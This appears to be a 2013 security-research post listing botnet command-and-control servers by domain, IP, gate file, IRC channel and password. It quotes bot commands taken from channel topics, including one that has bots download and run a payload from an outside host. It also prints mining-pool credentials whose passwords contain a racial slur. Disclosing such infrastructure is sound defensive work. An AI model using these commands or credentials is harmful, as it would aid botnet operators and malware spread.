This was loaded from snk’s latest IRC net. The bot is pretty strange, as it tries to connect to five unregistered domains before connecting to the IP. Here they are:
amnsreiuojy.ru
amnsreiuojy.in
amnsreiuojy.biz
amnsreiuojy.com
amnsreiuojy.nl
Server: 188.40.15.22
Gate file: /sg.php
Plugin: http://188.40.15.22/uploads/is.s
It appears to be some sort of Facebook spreader.
Hosting infos: http://whois.domaintools.com/188.40.15.22
srv5050.co (snk asper mod hosted by oneandone.net)
Resolved srv5050.co to 213.165.85.114, 212.227.141.241
snk is at it again
Server: srv5050.co (alternate domains srv5050.su r83g9dhwuabce.net)
Port: 5050
Channel: #u
* Topic for #u is: .j #s .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/55/18/43/58/44/121/85/110/127/122/107/127/30/111/81/
* Topic for #u set by x at Tue Jan 29 13:46:37 2013
* Topic for #s is: .d x /100/97/111/124/49/59/47/127/124/127/58/78/114/123/105/113/116/105/108/116/46/115/121/97/48/55/96/78/112/58/117/124/16/60/118/97/101/119/21/104/74/
* Topic for #s set by
webhostingprotection.info (Betabot http botnet hosted by Santrex.net)
Resolved webhostingprotection.info to 46.166.163.131
Server: webhostingprotection.info
Gate file: /icool/order.php
This was from the closed beta of the betabot http bot. The server files have been taken down now so not much point visiting the site. There wasn’t much to see except evidence of the coder’s man crush on the steely gaze of Brian Krebs. For
xtremehosting.info, sexwithme.info (Athena irc botnet hosted by voxility.net)
Resolved xtremehosting.info, sexwithme.info to 37.221.170.221
Server: xtremehosting.info
Port: 6667
Channel: #boss
Channel password: mystical
Topic for #boss is: !stop
Topic for #boss set by samiam at Fri Jan 25 10:31:21 2013
Nick format: [U|WIN7|x64|L]txzrks
Server: sexwithme.info
Port: 6667
Channel: #210
Nick format: _[USA|U|L|WIN7|x32|4c]rflbxwws
Current Local Users: 823 Max: 1585
#boss 243 [+sntVCTk] !stop
#210 402
irc.stressing.info (Multiple irc bots hosted by blacklotus.net)
Resolved irc.stressing.info, unknownkind.no-ip.org, 123456788.no-ip.info to 199.59.163.135
Aryan bot
Server: irc.stressing.info
Port: 6667
Current Global Users: 599 Max: 5456
Channel: #bonez
#bonez 126 [+smntMu] @j #quiet
Topic for #bonez is: @j #quiet
Topic for #bonez set by Mixtape at Tue Jan 22 03:00:44 2013
Topic for #quiet is: @dl hxxp://jelly.stressing.info/swagbonez/bot.exe 1
Topic for #quiet set by
zeonyx.info (Andromeda http botnet hosted by voxility.net)
Resolved zeonyx.info to 37.221.170.240 Server: zeonyx.info Gate file: /Balls/Panel/Panel/image.php Some bitcoin mining infos: http://Slinky:abc123@pool.bitclockers.com:8332 http://Zeroexe7_Zero8:nigger1@eu.triplemining.com:8344 http://Zeroexe7_Indian:nigger1@us2.eclipsemc.com:8337 Hosting infos: http://whois.domaintools.com/37.221.170.240
index.myftp.org (Andromeda http botnet hosted by hostkey.com)
Note: Be careful if you visit this site; the index page redirects to a shitty Java exploit. http://urlquery.net/report.php?id=814566
Resolved index.myftp.org to 141.105.67.83
Server: index.myftp.org
Gate file: /andy/image.php
Hosting infos: http://whois.domaintools.com/141.105.67.83
www.ultra-sales.com (Andromeda http botnet hosted by Vps6.net)
Resolved www.ultra-sales.com to 198.23.252.71
Server: www.ultra-sales.com
Gate file: /an/image.php
Updates and other malware hosted here: hxxp://www.ultra-sales.com/hosted/
Hosting infos: http://whois.domaintools.com/198.23.252.71
193.107.19.151 (Reverse proxy malware hosted by 2x4.ru)
Server: 193.107.19.151
Bot connect port: 8898
Web login port: 2567
Server config: http://193.107.19.151/config.cfg
According to the errors on the index page, it’s hosted on a Windows VPS.
Hosting infos: http://whois.domaintools.com/193.107.19.151
shellysdailylife.info (Insomnia irc botnet hosted by volumedrive.com)
Resolved shellysdailylife.info to 199.115.228.38
Server: shellysdailylife.info
Port: 44
Channel: #Insomnia
#Insomnia 341 [+sntu]
This is the second time this IP has been posted. The previous time it was also hosting Insomnia IRC bots.
Hosting infos: http://whois.domaintools.com/199.115.228.38